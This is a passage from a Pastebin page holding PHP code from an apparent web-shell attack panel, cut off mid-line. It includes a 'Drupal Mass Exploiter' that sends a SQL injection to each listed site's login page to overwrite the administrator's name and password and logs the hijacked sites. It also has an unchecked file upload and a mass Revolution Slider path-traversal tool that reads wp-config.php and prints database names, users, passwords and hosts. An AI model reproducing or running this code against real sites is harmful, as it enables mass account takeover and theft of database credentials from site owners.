  984. if(isset($_REQUEST['drupal']))
  985. {
  986. echo "<body>
  987. <center>
  988. <h1 style='color:green;text-shadow:0.5px 0px 0px white;'>Drupal Mass Exploiter</h1>
  989. <form method='post' action=''>
  990. <textarea name='url' rows='30' cols='50'>
  991. http://www.site.com
  992. http://www.site2.com
  993. </textarea><br><br>
  994. <input type='submit' name='submit' value='Attack'>
  995. </form>
  996. <br>
  997. ";
  998. $drupal7 = $_GET['drupal7'];
  999. if($drupal7 == 'drupal7'){
  1000. $filename = $_FILES['file']['name'];
  1001. $filetmp = $_FILES['file']['tmp_name'];
  1002. echo "<form method='POST' enctype='multipart/form-data'>
  1003. <input type='file'name='file' />
  1004. <input type='submit' value='drupal !' />
  1005. </form>";
  1006. move_uploaded_file($filetmp,$filename);
  1007. }
  1008. error_reporting(0);
  1009. if (isset($_POST['submit'])) {
  1010. function exploit($url) {
  1011. $post_data = "name[0;update users set name %3D 'con7ext' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
  1012. $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
  1013. ", 'content' => $post_data));
  1014. $ctx = stream_context_create($params);
  1015. $data = file_get_contents($url . '/user/login/', null, $ctx);
  1016. if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
  1017. $fp = fopen("xpld.txt", 'a+');
  1018. fwrite($fp, "Exploitied User: con7ext Pass: admin =====> {$url}/user/login");
  1019. fwrite($fp, "
  1020. ");
  1021. fwrite($fp, "--------------------------------------------------------------------------------------------------");
  1022. fwrite($fp, "
  1023. ");
  1024. fclose($fp);
  1025.  
  1026. echo "<font color='gold'><b>Success:<font color='red'> con7ext</font> Pass:<font color='red'> admin</font> =><a href='{$url}/user/login' target=_blank ><font color='green'> {$url}/user/login </font></a></font></b><br>";
  1027. } else {
  1028. echo "<font color='red'><b>Failed => {$url}/user/login</font></b><br>";
  1029. }
  1030. }
  1031.  
  1032. $urls = explode("
  1033. ", $_POST['url']);
  1034. foreach ($urls as $url) {
  1035. $url = @trim($url);
  1036. echo exploit($url);
  1037. }
  1038. }
  1039. }
  1040. if(isset($_REQUEST['revslider'])){
  1041. echo "<body>
  1042. <center>
  1043. mass revslider exploiting by mr.magnom recoded by con7ext<br>
  1044. <form method='post'>
  1045. <textarea name='sitessss' cols='50' rows='12'></textarea><br>
  1046. <input type='submit' name='comeon' value='get'>
  1047. </form>
  1048. ";
  1049. }
  1050. function findit($mytext,$starttag,$endtag) {
  1051. $posLeft = stripos($mytext,$starttag)+strlen($starttag);
  1052. $posRight = stripos($mytext,$endtag,$posLeft+1);
  1053. return substr($mytext,$posLeft,$posRight-$posLeft);
  1054. }
  1055. error_reporting(0);
  1056. set_time_limit(0);
  1057. $ya=$_POST['comeon'];
  1058. $co=$_POST['sitessss'];
  1059.  
  1060. if($ya){
  1061. $e=explode("\r\n",$co);
  1062. foreach($e as $bda){
  1063. //echo '<br>'.$bda;
  1064. $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
  1065. $dn=($bda).($linkof);
  1066. $file=@file_get_contents($dn);
  1067. if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
  1068. echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
  1069. echo "<center><font face='courier' color='#00BFFF' >".$bda."</font></center>";
  1070. echo "<font face='courier' color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
  1071. echo "<font face='courier' color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
  1072. echo "<font face='courier' color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
  1073. echo "<font face='courier' color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!